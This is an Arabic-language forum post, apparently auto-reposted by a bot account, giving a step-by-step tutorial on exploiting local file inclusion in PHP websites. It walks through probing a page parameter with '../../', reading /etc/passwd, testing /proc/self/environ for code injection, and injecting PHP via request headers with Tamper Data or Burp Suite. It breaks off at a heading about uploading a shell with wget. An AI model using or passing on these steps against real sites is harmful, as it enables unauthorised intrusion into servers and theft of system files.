حالة الموضوع:
مغلق
  1. .:: RSS ::.

    .:: RSS ::. عضوية آلية

    الأنتساب:
    ‏9 سبتمبر 2011
    المشاركات:
    14,005
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    36
    الإقامة:
    IQ-T34M
    <div><div align="center">بسم الله الرحمن الرحيم


    شرح بسيط أو نبذة بسيطة عن ثــغرات

    EXPLOITING LFI VULNERABILITIES


    اولاً :

    لنفترض أن الموقع المصاب


    http://www.site.com/index.php?page=1

    [​IMG]

    نمسح رقم 1 وندخل مدخلات أخرى اذا لم يظهر معانا الخطاء لنتأكد من الاصابة :

    مثال

    ../../

    أو

    '



    راح يظهر الخطاء البرمجي معانا

    [​IMG]

    حلو , تأكدنا من أصابته بثغره LFI

    ثانيا :

    نستعرض ملف /etc/passwd الي هو موجود في كل اجهز ال unix تقريبا مع العلم بأختلاف المسارات ...


    مثال

    http://www.site.com/index.php?page=1

    يصبح بعد الاستغلال كذا

    http://www.site.com/index.php?page=/etc/password

    راح تظهر معانا المعلومات بكل بساطه اذا كان الموقع مصاب !

    [​IMG]

    أستطعنا قرأت الملف ألان نحاول التأكد من قابلية الحـقن بالامر /proc/self/environ

    مثال


    http://www.site.com/index.php?page=1

    ندخل الامر

    http://www.site.com/index.php?page= /proc/self/environ


    يظهر معانا

    [​IMG]


    جمــيل جـدا ,,


    ثـالثا :



    نأتي الى عملية الحقن بأٍستخدام injecting whit PHP code

    تحتاج برنامج او بالاصح ( اضافة الى فايرفوكس )

    - timber data

    او

    -Live HTTP Headers

    او

    - Burp Suite

    بعد تنصيب وتشغيل الاداة ( timber data ) نــظغط على start timber ونسوي refresh لصفحة الموقع الي شغالين عليه .. راح تظهر لك ثلاث أختيارات أختار الامر timber

    [​IMG]


    هناك أمرين للحقن :


    UPLOAD ***** WITH WGET:
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة